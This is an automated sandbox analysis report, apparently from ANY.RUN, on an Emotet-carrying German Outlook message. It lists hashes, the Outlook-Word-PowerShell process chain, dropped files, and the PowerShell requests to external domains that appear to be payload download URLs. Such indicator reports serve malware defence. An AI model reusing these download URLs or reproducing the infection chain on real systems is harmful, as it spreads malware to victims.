Field | Value
---|---
File name | Re VersicherungsvertrДge; hier DO.msg
Full analysis | https://app.any.run/tasks/f0cd547d-6e34-48ad-bbbe-407d54007048
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.
Analysis date | June 19, 2019, 12:54:29
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags |
Indicators |
MIME | application/vnd.ms-outlook
File info | CDFV2 Microsoft Outlook Message
MD5 | B0D284F5C473D592F3D3A04C2EF63B2B
SHA1 | 16AE1394A00C66CFFD64BDEC3D438AB9A3FE3338
SHA256 | BB2095724F3207D266F4FDFC2DE58B1E564B8033BDF9DC465C4735DCE25AE36C
SSDEEP | 6144:FI77HUUUUUUUUUUUUUUUUUUUT52Vg1AWI+zy0WDGB:S77HUUUUUUUUUUUUUUUUUUUTCwI+zy0q

Extension | File type (score)
---|---
.msg | Outlook Message (41.3)
.oft | Outlook Form Template (24.1)
.doc | Microsoft Word document (18.6)
.doc | Microsoft Word document (old ver.) (11)

PID | Command line | Path | Indicators | Parent process | Process details
---|---|---|---|---|---
2940 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Re VersicherungsvertrДge; hier DO.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft Outlook; Version: 14.0.6025.1000
3296 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\3KU2FGAQ\Inf 6205 45687090.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3504 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity level: LOW; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000
312 | powershell -enc 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRDC3.tmp.cvr | — | — | —
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\3KU2FGAQ\Inf 6205 45687090 (2).doc\:Zone.Identifier:$DATA | — | — | —
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR897B.tmp.cvr | — | — | —
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_3EEA9CB3-A27C-410B-9ED0-FFA91A361BAE.0\274A1DC6.doc\:Zone.Identifier:$DATA | — | — | —
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | A7EF8876F2E524F39BFA03CFEB2D9DBC | 0D9D51E66A5C7EFAE114417FD256BF52ED1DE61C673281AFD25EBD20B8CBAE5F
3504 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_3EEA9CB3-A27C-410B-9ED0-FFA91A361BAE.0\DF6107B0.wmf | wmf | 60D8E1E1C7F8EC9AFFBA257A1CC33C34 | 62933D4B20488355538F68B4F890CB0FF4D358D93CD000C26239A65DA3156A18
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_3EEA9CB3-A27C-410B-9ED0-FFA91A361BAE.0\274A1DC6.doc | document | C105BFCF60DB3FC10ACE57D1A47D0BA7 | 206D23DE3EB99647646465FD66E1796F9081EB86E5AF4564F415AE5FD3B7F719
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_Calendar_2_F968E371D07C6345813E4F67F87329D8.dat | xml | B21ED3BD946332FF6EBC41A87776C6BB | B1AAC4E817CD10670B785EF8E5523C4A883F44138E50486987DC73054A46F6F4
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_WorkHours_1_4B703348AAB27141818740C9742D07BA.dat | xml | 807EF0FC900FEB3DA82927990083D6E7 | 4411E7DC978011222764943081500FFF0E43CBF7CCD44264BD1AB6306CA68913
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\3KU2FGAQ\Inf 6205 45687090.doc | document | C105BFCF60DB3FC10ACE57D1A47D0BA7 | 206D23DE3EB99647646465FD66E1796F9081EB86E5AF4564F415AE5FD3B7F719

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2940 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
312 | powershell.exe | GET | 404 | 198.2.196.29:80 | http://evamote.com/wp-content/l07bp8485/ | CN | html | 338 b | unknown |
312 | powershell.exe | GET | 404 | 202.181.99.31:80 | http://terminal-heaven.com/2006/w51z87/ | JP | html | 210 b | suspicious |

PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---|
2940 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
312 | powershell.exe | 104.28.6.23:443 | tecnologiaoficial.com | Cloudflare Inc | US | shared |
312 | powershell.exe | 206.72.205.242:443 | regigoscoring.com | NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC | US | unknown |
312 | powershell.exe | 202.181.99.31:80 | terminal-heaven.com | SAKURA Internet Inc. | JP | suspicious |
312 | powershell.exe | 198.2.196.29:80 | evamote.com | PEG TECH INC | CN | unknown |

Domain | IP | Reputation
---|---|---
config.messenger.msn.com | — | whitelisted
tecnologiaoficial.com | — | malicious
evamote.com | — | unknown
terminal-heaven.com | — | suspicious
www.huzurunkalbi.net | — | suspicious
regigoscoring.com | — | unknown